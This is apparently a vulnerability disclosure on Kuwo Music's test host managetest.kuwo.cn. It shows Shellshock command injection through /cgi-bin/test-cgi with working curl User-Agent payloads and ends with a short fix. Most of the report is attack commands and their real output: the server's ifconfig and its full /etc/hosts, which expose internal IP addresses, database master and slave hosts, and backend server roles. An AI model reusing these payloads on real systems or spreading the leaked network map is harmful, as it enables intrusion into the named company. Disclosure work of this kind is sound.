Kuwo Music (kuwo.cn): Bash command execution on a company host
managetest.kuwo.cn — Bash command execution (Shellshock-style) through /cgi-bin/test-cgi
curl -A "() { foo;}; echo; /sbin/ifconfig" http://managetest.kuwo.cn/cgi-bin/test-cgi
The User-Agent value (-A) reaches the CGI script as an environment variable; a vulnerable bash parses the leading "() { ...};" as an exported function definition and then executes the trailing command, so the output below is the server's own ifconfig.
Eth0 Link encap: Ethernet HWaddr 00: 1A: A0: 0D: FB: 38
Inet addr: 60.28.205.41 Bcast: 60.28.205.63 Mask: too many bytes
Inet6 addr: fe80: 21a: a0ff: fe0d: fb38/64 Scope: Link
Up broadcast running multicast mtu: 1500 Metric: 1
RX packets: 1150352590 errors: 0 dropped: 0 overruns: 0 frame: 0
TX packets: 2511972745 errors: 0 dropped: 0 overruns: 0 carrier: 0
Collisions: 0 txqueuelen: 1000
RX bytes: 228359309665 (212.6 GiB) TX bytes: 972996034118 (906.1 GiB)
Interrupt: 169 Memory: f4000000-f4011100
Eth0: 1 Link encap: Ethernet HWaddr 00: 1A: A0: 0D: FB: 38
Inet addr: 60.28.205.48 Bcast: 60.28.205.63 Mask: too many bytes
Up broadcast running multicast mtu: 1500 Metric: 1
Interrupt: 169 Memory: f4000000-f4011100
Eth1 Link encap: Ethernet HWaddr 00: 1A: A0: 0D: FB: 36
Inet addr: 192.168.0.42 Bcast: 192.168.255.255 Mask: 255.255.0.0
Inet6 addr: fe80: 21a: a0ff: fe0d: fb36/64 Scope: Link
Up broadcast running multicast mtu: 1500 Metric: 1
RX packets: 7819254624 errors: 0 dropped: 0 overruns: 0 frame: 0
TX packets: 11484217788 errors: 0 dropped: 0 overruns: 0 carrier: 0
Collisions: 0 txqueuelen: 1000
RX bytes: 3514910215382 (3.1 TiB) TX bytes: 14712204358111 (13.3 TiB)
Interrupt: 169 Memory: f8000000-f8011100
Eth1: 0 Link encap: Ethernet HWaddr 00: 1A: A0: 0D: FB: 36
Inet addr: 192.168.0.136 Bcast: 192.168.255.255 Mask: 255.255.0.0
Up broadcast running multicast mtu: 1500 Metric: 1
Interrupt: 169 Memory: f8000000-f8011100
Eth1: 1 Link encap: Ethernet HWaddr 00: 1A: A0: 0D: FB: 36
Inet addr: 192.168.0.139 Bcast: 192.168.255.255 Mask: 255.255.0.0
Up broadcast running multicast mtu: 1500 Metric: 1
Interrupt: 169 Memory: f8000000-f8011100
Lo Link encap: Local Loopback
Inet addr: 127.0.0.1 Mask: 255.0.0.0
Inet6 addr: ::1/128 Scope: Host
Up loopback running mtu: 16436 Metric: 1
RX packets: 111515227 errors: 0 dropped: 0 overruns: 0 frame: 0
TX packets: 111515227 errors: 0 dropped: 0 overruns: 0 carrier: 0
Collisions: 0 txqueuelen: 0
RX bytes: 66706130576 (62.1 GiB) TX bytes: 66706130576 (62.1 GiB)
Lo: 0 Link encap: Local Loopback
Inet addr: 60.28.205.61 Mask: 255.255.255.255
Up loopback running mtu: 16436 Metric: 1
Lo: 1 Link encap: Local Loopback
Inet addr: 60.28.193.246 Mask: 255.255.255.255
Up loopback running mtu: 16436 Metric: 1
Lo: 2 Link encap: Local Loopback
Inet addr: 127.0.0.2 Mask: 255.0.0.0
Up loopback running mtu: 16436 Metric: 1
curl -A "() { foo;}; echo; /bin/cat /etc/hosts" http://managetest.kuwo.cn/cgi-bin/test-cgi
Output — the host's /etc/hosts, which discloses internal hostnames, database/backend roles and private addressing:
# Do not remove the following line, or various programs
# That require network functionality will fail.
127.0.0.1 backup42.com backup42 localhost
127.0.0.1 image.kuwo.cn
#127.0.0.1 star.kuwo.cn
192.168.1.120 s120
192.168.0.80 lyric80
192.168.0.82 lyric82
192.168.0.81 lyric81
192.168.0.88 lyric88
192.168.0.96 lyric96
192.168.0.97 lyric97
60.29.226.181 www.kuwo.cn
60.29.226.181 kzone.kuwo.cn
192.168.0.248 bkserver248
192.168.0.187 bkserver187
192.168.0.179 bkserver179
192.168.0.169 bkserver169
192.168.0.170 bkserver170
192.168.210.240 bkserver240
192.168.0.190 bkserver190
192.168.0.43 bkserver43
192.168.0.174 bkserver174
192.168.0.39 bkserver39
192.168.0.40 bkserver40
192.168.217.183 bkserver183
192.168.0.189 bkserver189
192.168.0.26 bkserver26
#192.168.210.85 bkserver85
192.168.210.71 bkserver85
192.168.0.56 bkserver56
60.28.199.29 bkserver29
60.28.210.125 bkserver125
#60.28.205.61 nplserver.kuwo.cn
# 60.28.205.41 fang1.koowo.com
# 60.28.205.41 fang2.koowo.com
# 60.28.205.41 fang.koowo.com
127.0.0.1 test41.kuwo.cn
127.0.0.1 ksingservice.kuwo.cn
# 127.0.0.1 star.kuwo.cn
# 127.0.0.1 mv.koowo.com
# 60.28.205.48 fang1.koowo.com
# 60.28.205.48 fang2.koowo.com
# 60.28.205.48 fang.koowo.com
127.0.0.1 fang1.koowo.com
127.0.0.1 fang2.koowo.com
127.0.0.1 fang.koowo.com
#60.28.205.41 www.kuwo.cn
#221.238.18.39 kzone.kuwo.cn
#60.29.225.24 kzone.kuwo.cn
60.28.205.48 kzone48.koowo.com
60.28.205.48 kzone48.kuwo.cn
# 60.28.205.48 star.koowo.com
# The following settings are for koowo web develop
127.0.0.1 mainwebserver
192.168.0.174 mainwebserver_T
# Web servers
192.168.0.42 localwebserver
192.168.0.57 otherwebserver1
192.168.0.188 otherwebserver2
192.168.0.184 otherwebserver3
192.168.217.171 otherwebserver4
192.168.0.74 otherwebserver5
192.168.201.12 otherwebserver6
192.168.217.185 otherwebserver7
192.168.217.168 ucmwebserver1
192.168.217.173 ucmwebserver2
# Backend servers
192.168.0.169 lhserver
192.168.0.169 scoreserver
192.168.0.169 loginserver
192.168.0.169 guestserver
192.168.0.169 musicstatserver
192.168.0.49 l1_kserver
60.28.205.41 profilecacheserver
192.168.0.21 profileoscacheserver
192.168.0.21 usercacheserver
192.168.0.187 newsserver
192.168.0.187 activityserver
192.168.206.247 reslist.kuwo.cn
192.168.0.80 shouji.kuwo.cn
# Databases
192.168.0.185 queryservereditor
192.168.0.185 queryserver185
192.168.201.44 queryserver44
192.168.0.185 queryservermlog
192.168.0.186 queryserver186
#192.168.0.42 queryserver186
192.168.0.42 queryserver41
192.168.0.188 queryserver188
192.168.0.185 queryserver46
192.168.0.177 queryserver177
192.168.210.76 vipuserdatabaseserver
192.168.0.169 queryserver43
192.168.201.43 queryserver20143
192.168.0.189 queryserver189
#192.168.217.171 queryserver171
#192.168.210.104 queryserver171
192.168.226.167 queryserver171
60.29.226.168 queryserver190
192.168.217.171 queryserver74
192.168.201.16 queryserver16
192.168.201.17 queryserver17
192.168.10.50 queryserver50
192.168.10.51 queryserver51
192.168.210.125 queryserver87
#221.238.18.45 huangfan.kuwo.cn
60.28.204.156 huangfan.kuwo.cn
60.28.205.38 koowo.com
60.28.205.38 kuwo.cn
60.217.32.231 mail.koowo.cn
60.217.32.233 mail.kuwomail.com
192.168.199.24 queryserver29
192.168.0.42 local.kuwo.cn
#60.29.226.174 search.kuwo.cn
#192.168.0.53 search.kuwo.cn
#192.168.0.53 search.koowo.com
192.168.0.54 search.koowo.com
192.168.210.106 search.kuwo.cn
60.28.205.41 player.kuwo.cn
127.0.0.1 dh.kuwo.cn
60.28.205.57 css.kuwo.cn
#60.28.205.56 tips.kuwo.cn
60.28.205.39 data.search.kuwo.cn
#60.28.205.39 search.kuwo.cn
#192.168.0.53 search.koowo.com
#192.168.0.53 search.kuwo.cn
#60.29.226.174 search.kuwo.cn
#60.29.226.174 search.koowo.com
#192.168.0.146 nplserver.kuwo.cn
60.28.205.39 lyric.koowo.com
60.28.205.39 lyric.kuwo.cn
60.28.205.39 newlyric.koowo.com
60.28.205.39 newlyric.kuwo.cn
60.28.199.29 topmusic.kuwo.cn
60.28.199.24 queryserver24
218.27.132.18 mp3dl.cdn.kuwo.cn
# Test env for dj backend
#60.28.193.252 gyhserver1.kuwo.cn
# Kuwolive
# 60.28.201.38 antiserver.kuwo.cn
#192.168.0.181 antiserver.kuwo.cn
#192.168.0.170 antiserver.kuwo.cn
#192.168.206.247 antiserver.kuwo.cn
192.168.195.120 antiserver.kuwo.cn
192.168.217.188 nksingserver.kuwo.cn
# Game history
192.168.217.174 gamehistoryserver.kuwo.cn
#60.29.244.181 user.hvsop.cn
60.28.201.5 puppet.kuwo.cn
192.168.201.38 updateedit.kuwo.cn
# For zadan test
127.0.0.1 topic.kuwo.cn
127.0.0.1 pc.kuwo.cn
60.28.210.68 mobi.kuwo.cn
192.168.210.76 pay-master.db.kuwo.cn
192.168.226.167 pay-slave.db.kuwo.cn
192.168.201.30 pay-backup.db.kuwo.cn
192.168.210.76 vip-master.db.kuwo.cn
192.168.226.167 vip-slave.db.kuwo.cn
192.168.201.30 vip-backup.db.kuwo.cn
192.168...43 vip-test.db.kuwo.cn
192.168.210.74 queryserverdd
#60.28.210.114 zhiboserver.kuwo.cn
#60.28.201.37 x.kuwo.cn
Content-type: text/plain; charset=iso-8859-1
(The CGI's own Content-type header shows up after the command output because the injected "echo" ended the HTTP header block early, pushing the script's header into the body.)
Solution:
Remove test-cgi (and any other sample scripts) from cgi-bin; it has no production purpose and is the entry point used here. The payload form "() { ...};" indicates the underlying issue is the Bash environment-variable function-import bug (Shellshock), so bash on the host must also be patched — otherwise any other CGI or script that inherits request headers stays exploitable. Treat the hostnames and internal addresses disclosed in the /etc/hosts output above as already exposed.